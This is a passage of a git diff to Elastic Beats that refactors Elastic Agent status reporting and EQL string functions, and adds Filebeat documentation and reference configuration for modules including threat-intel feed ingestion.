b/x-pack/elastic-agent/pkg/core/state/state.go index 670cdc2a2f23..98319ad33150 100644 --- a/x-pack/elastic-agent/pkg/core/state/state.go +++ b/x-pack/elastic-agent/pkg/core/state/state.go @@ -5,6 +5,8 @@ package state import ( + "github.com/elastic/elastic-agent-client/v7/pkg/proto" + "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/core/process" ) @@ -13,27 +15,57 @@ type Status int const ( // Stopped is status describing not running application. - Stopped Status = iota + Stopped Status = -4 + // Crashed is status describing application is crashed. + Crashed Status = -3 + // Restarting is status describing application is restarting. + Restarting Status = -2 + // Updating is status describing application is updating. + Updating Status = -1 + // Starting is status describing application is starting. - Starting + Starting = Status(proto.StateObserved_STARTING) // Configuring is status describing application is configuring. - Configuring - // Running is status describing application is running. - Running + Configuring = Status(proto.StateObserved_CONFIGURING) + // Healthy is status describing application is running. + Healthy = Status(proto.StateObserved_HEALTHY) // Degraded is status describing application is degraded. - Degraded + Degraded = Status(proto.StateObserved_DEGRADED) // Failed is status describing application is failed. - Failed + Failed = Status(proto.StateObserved_FAILED) // Stopping is status describing application is stopping. - Stopping - // Crashed is status describing application is crashed. - Crashed - // Restarting is status describing application is restarting. - Restarting - // Updating is status describing application is updating. - Updating + Stopping = Status(proto.StateObserved_STOPPING) ) +// IsInternal returns true if the status is an internal status and not something that should be reported +// over the protocol as an actual status. +func (s Status) IsInternal() bool { + return s < Starting +} + +// ToProto converts the status to status that is compatible with the protocol. +func (s Status) ToProto() proto.StateObserved_Status { + if !s.IsInternal() { + return proto.StateObserved_Status(s) + } + if s == Updating || s == Restarting { + return proto.StateObserved_STARTING + } + if s == Crashed { + return proto.StateObserved_FAILED + } + if s == Stopped { + return proto.StateObserved_STOPPING + } + // fallback to degraded + return proto.StateObserved_DEGRADED +} + +// FromProto converts the status from protocol to status Agent representation. +func FromProto(s proto.StateObserved_Status) Status { + return Status(s) +} + // State wraps the process state and application status. type State struct { ProcessInfo *process.Info diff --git a/x-pack/elastic-agent/pkg/core/status/reporter.go b/x-pack/elastic-agent/pkg/core/status/reporter.go index 9c061b06e002..d4abd96a990f 100644 --- a/x-pack/elastic-agent/pkg/core/status/reporter.go +++ b/x-pack/elastic-agent/pkg/core/status/reporter.go @@ -9,54 +9,71 @@ import ( "github.com/google/uuid" + "github.com/elastic/elastic-agent-client/v7/pkg/proto" + "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/core/logger" + "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/core/state" ) -// AgentStatus represents a status of agent. -type AgentStatus int - -// UpdateFunc is used by components to notify reporter about status changes. -type UpdateFunc func(AgentStatus) +// AgentStatusCode is the status code for the Elastic Agent overall. +type AgentStatusCode int const ( // Healthy status means everything is fine. - Healthy AgentStatus = iota + Healthy AgentStatusCode = iota // Degraded status means something minor is preventing agent to work properly. Degraded // Failed status means agent is unable to work properly. Failed ) -var ( - humanReadableStatuses = map[AgentStatus]string{ - Healthy: "online", - Degraded: "degraded", - Failed: "error", - } -) +// String returns the string value for the agent code. +func (s AgentStatusCode) String() string { + return []string{"online", "degraded", "error"}[s] +} + +// AgentApplicationStatus returns the status of specific application. +type AgentApplicationStatus struct { + ID string + Name string + Status state.Status + Message string +} + +// AgentStatus returns the overall status of the Elastic Agent. +type AgentStatus struct { + Status AgentStatusCode + Message string + Applications []AgentApplicationStatus +} // Controller takes track of component statuses. type Controller interface { - Register(string) Reporter + RegisterComponent(string) Reporter + RegisterComponentWithPersistance(string, bool) Reporter + RegisterApp(id string, name string) Reporter Status() AgentStatus + StatusCode() AgentStatusCode StatusString() string UpdateStateID(string) } type controller struct { - lock sync.Mutex - status AgentStatus - reporters map[string]*reporter - log *logger.Logger - stateID string + mx sync.Mutex + status AgentStatusCode + reporters map[string]*reporter + appReporters map[string]*reporter + log *logger.Logger + stateID string } // NewController creates a new reporter. func NewController(log *logger.Logger) Controller { return &controller{ - status: Healthy, - reporters: make(map[string]*reporter), - log: log, + status: Healthy, + reporters: make(map[string]*reporter), + appReporters: make(map[string]*reporter), + log: log, } } @@ -67,75 +84,145 @@ func (r *controller) UpdateStateID(stateID string) { return } - r.lock.Lock() + r.mx.Lock() r.stateID = stateID - // cleanup status + // cleanup status for component reporters + // the status of app reports remain the same for _, rep := range r.reporters { if !rep.isRegistered { continue } - rep.lock.Lock() - rep.status = Healthy - rep.lock.Unlock() + rep.mx.Lock() + if !rep.isPersistent { + rep.status = state.Configuring + rep.message = "" + } + rep.mx.Unlock() } - r.lock.Unlock() + r.mx.Unlock() r.updateStatus() } // Register registers new component for status updates. -func (r *controller) Register(componentIdentifier string) Reporter { +func (r *controller) RegisterComponent(componentIdentifier string) Reporter { + return r.RegisterComponentWithPersistance(componentIdentifier, false) +} + +// Register registers new component for status updates. +func (r *controller) RegisterComponentWithPersistance(componentIdentifier string, persistent bool) Reporter { id := componentIdentifier + "-" + uuid.New().String()[:8] rep := &reporter{ + name: componentIdentifier, isRegistered: true, unregisterFunc: func() { - r.lock.Lock() + r.mx.Lock() delete(r.reporters, id) - r.lock.Unlock() + r.mx.Unlock() }, notifyChangeFunc: r.updateStatus, + isPersistent: persistent, } - r.lock.Lock() + r.mx.Lock() r.reporters[id] = rep - r.lock.Unlock() + r.mx.Unlock() + + return rep +} + +// RegisterApp registers new component for status updates. +func (r *controller) RegisterApp(componentIdentifier string, name string) Reporter { + id := componentIdentifier + "-" + uuid.New().String()[:8] + rep := &reporter{ + name: name, + status: state.Stopped, + isRegistered: true, + unregisterFunc: func() { + r.mx.Lock() + delete(r.appReporters, id) + r.mx.Unlock() + }, + notifyChangeFunc: r.updateStatus, + } + + r.mx.Lock() + r.appReporters[id] = rep + r.mx.Unlock() return rep } // Status retrieves current agent status. func (r *controller) Status() AgentStatus { + r.mx.Lock() + defer r.mx.Unlock() + apps := make([]AgentApplicationStatus, 0, len(r.appReporters)) + for key, rep := range r.appReporters { + rep.mx.Lock() + apps = append(apps, AgentApplicationStatus{ + ID: key, + Name: rep.name, + Status: rep.status, + Message: rep.message, + }) + rep.mx.Unlock() + } + return AgentStatus{ + Status: r.status, + Message: "", + Applications: apps, + } +} + +// StatusCode retrieves current agent status code. +func (r *controller) StatusCode() AgentStatusCode { + r.mx.Lock() + defer r.mx.Unlock() return r.status } func (r *controller) updateStatus() { status := Healthy - r.lock.Lock() + r.mx.Lock() for id, rep := range r.reporters { - s := rep.status + s := statusToAgentStatus(rep.status) if s > status { status = s } - r.log.Debugf("'%s' has status '%s'", id, humanReadableStatuses[s]) + r.log.Debugf("'%s' has status '%s'", id, s) if status == Failed { break } } + if status != Failed { + for id, rep := range r.appReporters { + s := statusToAgentStatus(rep.status) + if s > status { + status = s + } + + r.log.Debugf("'%s' has status '%s'", id, s) + if status == Failed { + break + } + } + } if r.status != status { r.logStatus(status) r.status = status } - r.lock.Unlock() + r.mx.Unlock() } -func (r *controller) logStatus(status AgentStatus) { +func (r *controller) logStatus(status AgentStatusCode) { logFn := r.log.Infof if status == Degraded { logFn = r.log.Warnf @@ -143,36 +230,40 @@ func (r *controller) logStatus(status AgentStatus) { logFn = r.log.Errorf } - logFn("Elastic Agent status changed to: '%s'", humanReadableStatuses[status]) + logFn("Elastic Agent status changed to: '%s'", status) } // StatusString retrieves human readable string of current agent status. func (r *controller) StatusString() string { - return humanReadableStatuses[r.Status()] + return r.StatusCode().String() } // Reporter reports status of component type Reporter interface { - Update(AgentStatus) + Update(state.Status, string) Unregister() } type reporter struct { - lock sync.Mutex + name string + mx sync.Mutex + isPersistent bool isRegistered bool - status AgentStatus + status state.Status + message string unregisterFunc func() notifyChangeFunc func() } // Update updates the status of a component. -func (r *reporter) Update(s AgentStatus) { - r.lock.Lock() - defer r.lock.Unlock() +func (r *reporter) Update(s state.Status, message string) { + r.mx.Lock() + defer r.mx.Unlock() if !r.isRegistered { return } + r.message = message if r.status != s { r.status = s r.notifyChangeFunc() @@ -182,10 +273,21 @@ func (r *reporter) Update(s AgentStatus) { // Unregister unregister status from reporter. Reporter will no longer be taken into consideration // for overall status computation. func (r *reporter) Unregister() { - r.lock.Lock() - defer r.lock.Unlock() + r.mx.Lock() + defer r.mx.Unlock() r.isRegistered = false r.unregisterFunc() r.notifyChangeFunc() } + +func statusToAgentStatus(status state.Status) AgentStatusCode { + s := status.ToProto() + if s == proto.StateObserved_DEGRADED { + return Degraded + } + if s == proto.StateObserved_FAILED { + return Failed + } + return Healthy +} diff --git a/x-pack/elastic-agent/pkg/core/status/reporter_test.go b/x-pack/elastic-agent/pkg/core/status/reporter_test.go index 5706f42c22a6..55fcd3e04fe4 100644 --- a/x-pack/elastic-agent/pkg/core/status/reporter_test.go +++ b/x-pack/elastic-agent/pkg/core/status/reporter_test.go @@ -10,85 +10,92 @@ import ( "github.com/stretchr/testify/assert" "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/core/logger" + "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/core/state" ) func TestReporter(t *testing.T) { l, _ := logger.New("") t.Run("healthy by default", func(t *testing.T) { r := NewController(l) - assert.Equal(t, Healthy, r.Status()) + assert.Equal(t, Healthy, r.StatusCode()) assert.Equal(t, "online", r.StatusString()) }) t.Run("healthy when all healthy", func(t *testing.T) { r := NewController(l) - r1 := r.Register("r1") - r2 := r.Register("r2") - r3 := r.Register("r3") - - r1.Update(Healthy) - r2.Update(Healthy) - r3.Update(Healthy) - - assert.Equal(t, Healthy, r.Status()) + r1 := r.RegisterComponent("r1") + r2 := r.RegisterComponent("r2") + r3 := r.RegisterComponent("r3") + a1 := r.RegisterApp("app-1", "app") + a2 := r.RegisterApp("app-2", "app") + a3 := r.RegisterApp("other-1", "other") + + r1.Update(state.Healthy, "") + r2.Update(state.Healthy, "") + r3.Update(state.Healthy, "") + a1.Update(state.Healthy, "") + a2.Update(state.Healthy, "") + a3.Update(state.Healthy, "") + + assert.Equal(t, Healthy, r.StatusCode()) assert.Equal(t, "online", r.StatusString()) }) t.Run("degraded when one degraded", func(t *testing.T) { r := NewController(l) - r1 := r.Register("r1") - r2 := r.Register("r2") - r3 := r.Register("r3") + r1 := r.RegisterComponent("r1") + r2 := r.RegisterComponent("r2") + r3 := r.RegisterComponent("r3") - r1.Update(Healthy) - r2.Update(Degraded) - r3.Update(Healthy) + r1.Update(state.Healthy, "") + r2.Update(state.Degraded, "degraded") + r3.Update(state.Healthy, "") - assert.Equal(t, Degraded, r.Status()) + assert.Equal(t, Degraded, r.StatusCode()) assert.Equal(t, "degraded", r.StatusString()) }) t.Run("failed when one failed", func(t *testing.T) { r := NewController(l) - r1 := r.Register("r1") - r2 := r.Register("r2") - r3 := r.Register("r3") + r1 := r.RegisterComponent("r1") + r2 := r.RegisterComponent("r2") + r3 := r.RegisterComponent("r3") - r1.Update(Healthy) - r2.Update(Failed) - r3.Update(Healthy) + r1.Update(state.Healthy, "") + r2.Update(state.Failed, "failed") + r3.Update(state.Healthy, "") - assert.Equal(t, Failed, r.Status()) + assert.Equal(t, Failed, r.StatusCode()) assert.Equal(t, "error", r.StatusString()) }) t.Run("failed when one failed and one degraded", func(t *testing.T) { r := NewController(l) - r1 := r.Register("r1") - r2 := r.Register("r2") - r3 := r.Register("r3") + r1 := r.RegisterComponent("r1") + r2 := r.RegisterComponent("r2") + r3 := r.RegisterComponent("r3") - r1.Update(Healthy) - r2.Update(Failed) - r3.Update(Degraded) + r1.Update(state.Healthy, "") + r2.Update(state.Failed, "failed") + r3.Update(state.Degraded, "degraded") - assert.Equal(t, Failed, r.Status()) + assert.Equal(t, Failed, r.StatusCode()) assert.Equal(t, "error", r.StatusString()) }) t.Run("degraded when degraded and healthy, failed unregistered", func(t *testing.T) { r := NewController(l) - r1 := r.Register("r1") - r2 := r.Register("r2") - r3 := r.Register("r3") + r1 := r.RegisterComponent("r1") + r2 := r.RegisterComponent("r2") + r3 := r.RegisterComponent("r3") - r1.Update(Healthy) - r2.Update(Failed) - r3.Update(Degraded) + r1.Update(state.Healthy, "") + r2.Update(state.Failed, "failed") + r3.Update(state.Degraded, "degraded") r2.Unregister() - assert.Equal(t, Degraded, r.Status()) + assert.Equal(t, Degraded, r.StatusCode()) assert.Equal(t, "degraded", r.StatusString()) }) } diff --git a/x-pack/elastic-agent/pkg/eql/eql_test.go b/x-pack/elastic-agent/pkg/eql/eql_test.go index 5f67c516c81c..c594a6c2a201 100644 --- a/x-pack/elastic-agent/pkg/eql/eql_test.go +++ b/x-pack/elastic-agent/pkg/eql/eql_test.go @@ -296,7 +296,7 @@ func TestEql(t *testing.T) { {expression: "stringContains('hello world', 'rol')", result: false}, {expression: "stringContains('hello world', 'o w', 'too many')", err: true}, {expression: "stringContains(0, 'o w', 'too many')", err: true}, - {expression: "stringContains('hello world', 0)", err: true}, + {expression: "stringContains('hello world', 0)", result: false}, // Bad expression and malformed expression {expression: "length('hello')", err: true}, diff --git a/x-pack/elastic-agent/pkg/eql/methods_str.go b/x-pack/elastic-agent/pkg/eql/methods_str.go index 781e193d9246..b7c49a610365 100644 --- a/x-pack/elastic-agent/pkg/eql/methods_str.go +++ b/x-pack/elastic-agent/pkg/eql/methods_str.go @@ -25,12 +25,7 @@ func endsWith(args []interface{}) (interface{}, error) { if len(args) != 2 { return nil, fmt.Errorf("endsWith: accepts exactly 2 arguments; recieved %d", len(args)) } - input, iOk := args[0].(string) - suffix, sOk := args[1].(string) - if !iOk || !sOk { - return nil, fmt.Errorf("endsWith: accepts exactly 2 string arguments; recieved %T and %T", args[0], args[1]) - } - return strings.HasSuffix(input, suffix), nil + return strings.HasSuffix(toString(args[0]), toString(args[1])), nil } // indexOf returns the starting index of substring @@ -38,11 +33,8 @@ func indexOf(args []interface{}) (interface{}, error) { if len(args) < 2 || len(args) > 3 { return nil, fmt.Errorf("indexOf: accepts 2-3 arguments; recieved %d", len(args)) } - input, iOk := args[0].(string) - substring, sOk := args[1].(string) - if !iOk || !sOk { - return nil, fmt.Errorf("indexOf: argument 0 and 1 must be a string; recieved %T and %T", args[0], args[1]) - } + input := toString(args[0]) + substring := toString(args[1]) start := 0 if len(args) > 2 { s, sOk := args[2].(int) @@ -59,10 +51,7 @@ func match(args []interface{}) (interface{}, error) { if len(args) < 2 { return nil, fmt.Errorf("match: accepts minimum of 2 arguments; recieved %d", len(args)) } - input, iOk := args[0].(string) - if !iOk { - return nil, fmt.Errorf("match: argument 0 must be a string; recieved %T", args[0]) - } + input := toString(args[0]) for i, reg := range args[1:] { switch r := reg.(type) { case string: @@ -85,10 +74,7 @@ func number(args []interface{}) (interface{}, error) { if len(args) < 1 || len(args) > 2 { return nil, fmt.Errorf("number: accepts between 1-2 arguments; recieved %d", len(args)) } - input, iOk := args[0].(string) - if !iOk { - return nil, fmt.Errorf("number: argument 0 must be a string; recieved %T", args[0]) - } + input := toString(args[0]) base := 10 if len(args) > 1 { switch a := args[1].(type) { @@ -113,12 +99,7 @@ func startsWith(args []interface{}) (interface{}, error) { if len(args) != 2 { return nil, fmt.Errorf("startsWith: accepts exactly 2 arguments; recieved %d", len(args)) } - input, iOk := args[0].(string) - prefix, pOk := args[1].(string) - if !iOk || !pOk { - return nil, fmt.Errorf("startsWith: accepts exactly 2 string arguments; recieved %T and %T", args[0], args[1]) - } - return strings.HasPrefix(input, prefix), nil + return strings.HasPrefix(toString(args[0]), toString(args[1])), nil } // str converts the argument into a string @@ -134,12 +115,7 @@ func stringContains(args []interface{}) (interface{}, error) { if len(args) != 2 { return nil, fmt.Errorf("stringContains: accepts exactly 2 arguments; recieved %d", len(args)) } - input, iOk := args[0].(string) - substr, sOk := args[1].(string) - if !iOk || !sOk { - return nil, fmt.Errorf("stringContains: accepts exactly 2 string arguments; recieved %T and %T", args[0], args[1]) - } - return strings.Contains(input, substr), nil + return strings.Contains(toString(args[0]), toString(args[1])), nil } func toString(arg interface{}) string { diff --git a/x-pack/elastic-agent/pkg/reporter/reporter.go b/x-pack/elastic-agent/pkg/reporter/reporter.go index 3b128841b2a1..b1568e9f3f1e 100644 --- a/x-pack/elastic-agent/pkg/reporter/reporter.go +++ b/x-pack/elastic-agent/pkg/reporter/reporter.go @@ -108,7 +108,7 @@ func generateRecord(agentID string, id string, name string, s state.State) event case state.Configuring: subType = EventSubTypeConfig subTypeText = EventSubTypeConfig - case state.Running: + case state.Healthy: subType = EventSubTypeRunning subTypeText = EventSubTypeRunning case state.Degraded: diff --git a/x-pack/elastic-agent/pkg/reporter/reporter_test.go b/x-pack/elastic-agent/pkg/reporter/reporter_test.go index ace35f0550b4..8b0c095f654f 100644 --- a/x-pack/elastic-agent/pkg/reporter/reporter_test.go +++ b/x-pack/elastic-agent/pkg/reporter/reporter_test.go @@ -62,11 +62,11 @@ func TestTypes(t *testing.T) { EventMessage: "Application: a-configuring[id]: State changed to CONFIG: Configuring", }, { - Status: state.Running, - StatusMessage: "Running", + Status: state.Healthy, + StatusMessage: "Healthy", EventType: EventTypeState, EventSubType: EventSubTypeRunning, - EventMessage: "Application: a-running[id]: State changed to RUNNING: Running", + EventMessage: "Application: a-healthy[id]: State changed to RUNNING: Healthy", }, { Status: state.Degraded, diff --git a/x-pack/elastic-agent/spec/apm-server.yml b/x-pack/elastic-agent/spec/apm-server.yml index d86e77fb0ffb..589972ecad6c 100644 --- a/x-pack/elastic-agent/spec/apm-server.yml +++ b/x-pack/elastic-agent/spec/apm-server.yml @@ -3,6 +3,19 @@ cmd: apm-server artifact: apm-server args: ["-E", "management.enabled=true", "-E", "management.mode=x-pack-fleet", "-E", "apm-server.data_streams.enabled=true"] rules: + - copy_to_list: + item: fleet + to: inputs + on_conflict: noop + - map: + path: fleet + rules: + - remove_key: + key: access_api_key + - remove_key: + key: reporting + - remove_key: + key: agent - fix_stream: {} - filter_values: selector: inputs @@ -13,4 +26,5 @@ rules: selectors: - inputs - output + - fleet when: length(${inputs}) > 0 and hasKey(${output}, 'elasticsearch') diff --git a/x-pack/elastic-agent/spec/fleet-server.yml b/x-pack/elastic-agent/spec/fleet-server.yml index 1c444f8990e7..167bd9f83058 100644 --- a/x-pack/elastic-agent/spec/fleet-server.yml +++ b/x-pack/elastic-agent/spec/fleet-server.yml @@ -24,6 +24,10 @@ rules: selectors: [ fleet.server.output.elasticsearch ] path: output + - select_into: + selectors: [ fleet.server.policy.id ] + path: inputs.0.policy + - map: path: fleet rules: diff --git a/x-pack/filebeat/Jenkinsfile.yml b/x-pack/filebeat/Jenkinsfile.yml index 0581f2cd8600..5985900fcdad 100644 --- a/x-pack/filebeat/Jenkinsfile.yml +++ b/x-pack/filebeat/Jenkinsfile.yml @@ -88,3 +88,7 @@ stages: # - "windows-7-32" # branches: true ## for all the branches # tags: true ## for all the tags + packaging-linux: + packaging-linux: "mage package" + e2e: + enabled: false \ No newline at end of file diff --git a/x-pack/filebeat/docs/inputs/input-httpjson.asciidoc b/x-pack/filebeat/docs/inputs/input-httpjson.asciidoc index 64247b517f82..56b022d3e9a0 100644 --- a/x-pack/filebeat/docs/inputs/input-httpjson.asciidoc +++ b/x-pack/filebeat/docs/inputs/input-httpjson.asciidoc @@ -499,7 +499,7 @@ filebeat.inputs: [float] ==== `response.split` -Split operation to apply to the response once it is received. A split can convert a map or an array into multiple events. +Split operation to apply to the response once it is received. A split can convert a map, array, or string into multiple events. [float] ==== `response.split[].target` @@ -509,7 +509,7 @@ Defines the target field upon the split operation will be performed. [float] ==== `response.split[].type` -Defines the field type of the target. Allowed values: `array`, `map`. Default: `array`. +Defines the field type of the target. Allowed values: `array`, `map`, `string`. `string` requires the use of the `delimiter` options to specify what characters to split the string on. `delimiter` always behaves as if `keep_parent` is set to `true`. Default: `array`. [float] ==== `response.split[].transforms` @@ -529,6 +529,11 @@ NOTE: in this context, `body.*` will be the result of all the previous transform If set to true, the fields from the parent document (at the same level as `target`) will be kept. Otherwise a new document will be created using `target` as the root. Default: `false`. +[float] +==== `response.split[].delimiter` + +Required if using split type of `string`. This is the sub string used to split the string. For example if `delimiter` was "\n" and the string was "line 1\nline 2", then the split would result in "line 1" and "line 2". + [float] ==== `response.split[].key_field` @@ -804,6 +809,56 @@ This will output: ] ---- +- We have a response with a keys whose value is a string. We want the string to be split on a delimiter and a document for each sub strings. + ++ +["source","json",subs="attributes"] +---- +{ + "this": "is kept", + "lines": "Line 1\nLine 2\nLine 3" +} +---- + ++ +The config will look like: + ++ +["source","yaml",subs="attributes"] +---- +filebeat.inputs: +- type: httpjson + config_version: 2 + interval: 1m + request.url: https://example.com + response.split: + target: body.lines + type: string + delimiter: "\n" +---- + ++ +This will output: + ++ +["source","json",subs="attributes"] +---- +[ + { + "this": "is kept", + "lines": "Line 1" + }, + { + "this": "is kept", + "lines": "Line 2" + }, + { + "this": "is kept", + "lines": "Line 3" + } +] +---- + [[cursor]] [float] ==== `cursor` diff --git a/x-pack/filebeat/filebeat.reference.yml b/x-pack/filebeat/filebeat.reference.yml index 01f65a4c9101..db79f9abb8ce 100644 --- a/x-pack/filebeat/filebeat.reference.yml +++ b/x-pack/filebeat/filebeat.reference.yml @@ -616,6 +616,23 @@ filebeat.modules: # Maximum duration before AWS API request will be interrupted #var.api_timeout: 120s + amp: + enabled: true + + # Set which input to use between httpjson (default) or file. + #var.input: httpjson + + # The API URL + #var.url: https://api.amp.cisco.com/v1/events + # The client ID used as a username for the API requests. + #var.client_id: + # The API key related to the client ID. + #var.api_key: + # How far to look back the first time the module is started. Expects an amount of hours. + #var.first_interval: 24h + # Overriding the default request timeout, optional. + #var.request_timeout: 60s + #------------------------------- Coredns Module ------------------------------- - module: coredns # Fileset for native deployment @@ -1632,6 +1649,18 @@ filebeat.modules: #var.external_zones: +#------------------------------- Pensando Module ------------------------------- +- module: pensando +# Firewall logs + dfw: + enabled: true + var.syslog_host: 0.0.0.0 + var.syslog_port: 9001 + + # Set custom paths for the log files. If left empty, + # Filebeat will choose the paths depending on your OS. + # var.paths: + #------------------------------ PostgreSQL Module ------------------------------ #- module: postgresql # Logs @@ -1955,6 +1984,102 @@ filebeat.modules: # Filebeat will choose the paths depending on your OS. #var.paths: +#----------------------------- Threatintel Module ----------------------------- +- module: threatintel + abuseurl: + enabled: true + + # Input used for ingesting threat intel data. + var.input: httpjson + + # The URL used for Threat Intel API calls. + var.url: https://urlhaus-api.abuse.ch/v1/urls/recent/ + + # The interval to poll the API for updates. + var.interval: 60m + + abusemalware: + enabled: true + + # Input used for ingesting threat intel data. + var.input: httpjson + + # The URL used for Threat Intel API calls. + var.url: https://urlhaus-api.abuse.ch/v1/payloads/recent/ + + # The interval to poll the API for updates. + var.interval: 60m + + misp: + enabled: true + + # Input used for ingesting threat intel data, defaults to JSON. + var.input: httpjson + + # The URL of the MISP instance, should end with "/events/restSearch". + var.url: https://SERVER/events/restSearch + + # The authentication token used to contact the MISP API. Found when looking at user account in the MISP UI. + var.api_token: API_KEY + + # Optional filters that can be applied to the API for filtering out results. This should support the majority of fields in a MISP context. + # For examples please reference the filebeat module documentation. + #var.filters: + # - threat_level: [4, 5] + # - to_ids: true + + # How far back to look once the beat starts up for the first time, the value has to be in hours. Each request afterwards will filter on any event newer + # than the last event that was already ingested. + var.first_interval: 24h + + # The interval to poll the API for updates. + var.interval: 60m + + otx: + enabled: true + + # Input used for ingesting threat intel data + var.input: httpjson + + # The URL used for OTX Threat Intel API calls. + var.url: https://otx.alienvault.com/api/v1/indicators/export + + # The authentication token used to contact the OTX API, can be found on the OTX UI. + var.api_token: API_KEY + + # Optional filters that can be applied to retrieve only specific indicators. + #var.types: "domain,IPv4,hostname,url,FileHash-SHA256" + + # How many hours to look back for each request, should be close to the configured interval. Deduplication of events is handled by the module. + var.lookback_range: 2h + + # How far back to look once the beat starts up for the first time, the value has to be in hours. + var.first_interval: 24h + + # The interval to poll the API for updates + var.interval: 60m + + anomali: + enabled: true + + # Input used for ingesting threat intel data + var.input: httpjson + + # The URL used for Threat Intel API calls. + var.url: https://limo.anomali.com/api/v1/taxii2/feeds/collections/41/objects + + # The Username used by anomali Limo, defaults to guest. + #var.username: guest + + # The password used by anomali Limo, defaults to guest. + #var.password: guest + + # How far back to look once the beat starts up for the first time, the value has to be in hours. + var.first_interval: 24h + + # The interval to poll the API for updates + var.interval: 60m + #---------------------------- Apache Tomcat Module ---------------------------- - module: tomcat log: @@ -2013,7 +2138,7 @@ filebeat.modules: http: enabled: true intel: - enabled: true + enabled: true irc: enabled: true kerberos: @@ -2036,6 +2161,8 @@ filebeat.modules: enabled: true rfb: enabled: true + signature: + enabled: true sip: enabled: true smb_cmd: diff --git a/x-pack/filebeat/include/list.go b/x-pack/filebeat/include/list.go index f760be10844a..a21eb75380f9 100644 --- a/x-pack/filebeat/include/list.go +++ b/x-pack/filebeat/include/list.go @@ -55,6 +55,7 @@ import ( _ "github.com/elastic/beats/v7/x-pack/filebeat/module/sophos" _ "github.com/elastic/beats/v7/x-pack/filebeat/module/squid" _ "github.com/elastic/beats/v7/x-pack/filebeat/module/suricata" + _ "github.com/elastic/beats/v7/x-pack/filebeat/module/threatintel" _ "github.com/elastic/beats/v7/x-pack/filebeat/module/tomcat" _ "github.com/elastic/beats/v7/x-pack/filebeat/module/zeek" _ "github.com/elastic/beats/v7/x-pack/filebeat/module/zoom" diff --git a/x-pack/filebeat/input/awss3/_meta/fields.yml b/x-pack/filebeat/input/awss3/_meta/fields.yml index c937f8282e84..a4dfe8be68c6 100644 --- a/x-pack/filebeat/input/awss3/_meta/fields.yml +++ b/x-pack/filebeat/input/awss3/_meta/fields.yml @@ -2,7 +2,7 @@ title: "s3" description: > S3 fields from s3 input. - release: beta + release: ga fields: - name: bucket_name type: keyword diff --git a/x-pack/filebeat/input/awss3/fields.go b/x-pack/filebeat/input/awss3/fields.go index c507150f8e4b..ae8d04dce148 100644 --- a/x-pack/filebeat/input/awss3/fields.go +++ b/x-pack/filebeat/input/awss3/fields.go @@ -19,5 +19,5 @@ func init() { // AssetAwss3 returns asset data. // This is the base64 encoded gzipped contents of input/awss3. func AssetAwss3() string { - return "eJykjjGugzAQRHufYkQPjTsX/wi/+QdABg8fB4ORvSTi9pGBJlKkFNlipZ3dnTc1Ju4GWStAvAQaVFlXCnDMffKr+LgY/CgA+NMYPIPLGFKckTX8sm7SKCAx0GYadBSrcN2Z463GYuey2vqJ0pbh0AHZV5qS4BGTu7Q33FK/dibiABlZcpxekNGW5jNC/EeiJM873ZGveYHH7sZe2on71+zT6gP7GQAA//+k2GkG" + return "eJykjrFuhDAQRHt/xYgeGncu8glp8gHI4AEcDEb2koi/PxloTjrpittipR3tzJsaMw+DrBUgXgINqqwrBTjmPvlNfFwNvhQA/GgMnsFlDCkuyBp+3XZpFJAYaDMNRqtwf5nTVGO1Cw26vZ8pbTlOHZBjoyn8/5jcrb2glvm2CxEHyMTS4sqCTLYsnxHiiERJnn90Z7vmCR67X/bSzjw+Zl9Rb9iPAAAA//+ahmgy" } diff --git a/x-pack/filebeat/input/awss3/input.go b/x-pack/filebeat/input/awss3/input.go index 98d8c60d77b4..ccbe105974d8 100644 --- a/x-pack/filebeat/input/awss3/input.go +++ b/x-pack/filebeat/input/awss3/input.go @@ -25,7 +25,7 @@ const inputName = "aws-s3" func Plugin() v2.Plugin { return v2.Plugin{ Name: inputName, - Stability: feature.Beta, + Stability: feature.Stable, Deprecated: false, Info: "Collect logs from s3", Manager: v2.ConfigureWith(configure), diff --git a/x-pack/filebeat/input/cloudfoundry/v1.go b/x-pack/filebeat/input/cloudfoundry/v1.go index ffc5ccd4a75b..100fb9443191 100644 --- a/x-pack/filebeat/input/cloudfoundry/v1.go +++ b/x-pack/filebeat/input/cloudfoundry/v1.go @@ -51,7 +51,7 @@ func (i *inputV1) Run(ctx v2.Context, publisher stateless.Publisher) error { return errors.Wrapf(err, "initializing doppler consumer") } - stopCtx, cancel := ctxtool.WithFunc(ctxtool.FromCanceller(ctx.Cancelation), func() { + stopCtx, cancel := ctxtool.WithFunc(ctx.Cancelation, func() { // wait stops the consumer and waits for all internal go-routines to be stopped. consumer.Wait() }) diff --git a/x-pack/filebeat/input/http_endpoint/input.go b/x-pack/filebeat/input/http_endpoint/input.go index 2c799c1f14fa..3e01616ed48a 100644 --- a/x-pack/filebeat/input/http_endpoint/input.go +++ b/x-pack/filebeat/input/http_endpoint/input.go @@ -103,9 +103,7 @@ func (e *httpEndpoint) Run(ctx v2.Context, publisher stateless.Publisher) error mux := http.NewServeMux() mux.HandleFunc(e.config.URL, withValidator(validator, handler.apiResponse)) server := &http.Server{Addr: e.addr, TLSConfig: e.tlsConfig, Handler: mux} - _, cancel := ctxtool.WithFunc(ctxtool.FromCanceller(ctx.Cancelation), func() { - server.Close() - }) + _, cancel := ctxtool.WithFunc(ctx.Cancelation, func() { server.Close() }) defer cancel() var err error diff --git a/x-pack/filebeat/input/httpjson/input.go b/x-pack/filebeat/input/httpjson/input.go index 0c86d8e530e3..ca2e43483d1b 100644 --- a/x-pack/filebeat/input/httpjson/input.go +++ b/x-pack/filebeat/input/httpjson/input.go @@ -125,7 +125,7 @@ func run( publisher cursor.Publisher, cursor *cursor.Cursor, ) error { - log := ctx.Logger.With("url", config.URL) + log := ctx.Logger.With("input_url", config.URL) stdCtx := ctxtool.FromCanceller(ctx.Cancelation) diff --git a/x-pack/filebeat/input/httpjson/internal/v2/config_response.go b/x-pack/filebeat/input/httpjson/internal/v2/config_response.go index be265409ba84..0bb519103871 100644 --- a/x-pack/filebeat/input/httpjson/internal/v2/config_response.go +++ b/x-pack/filebeat/input/httpjson/internal/v2/config_response.go 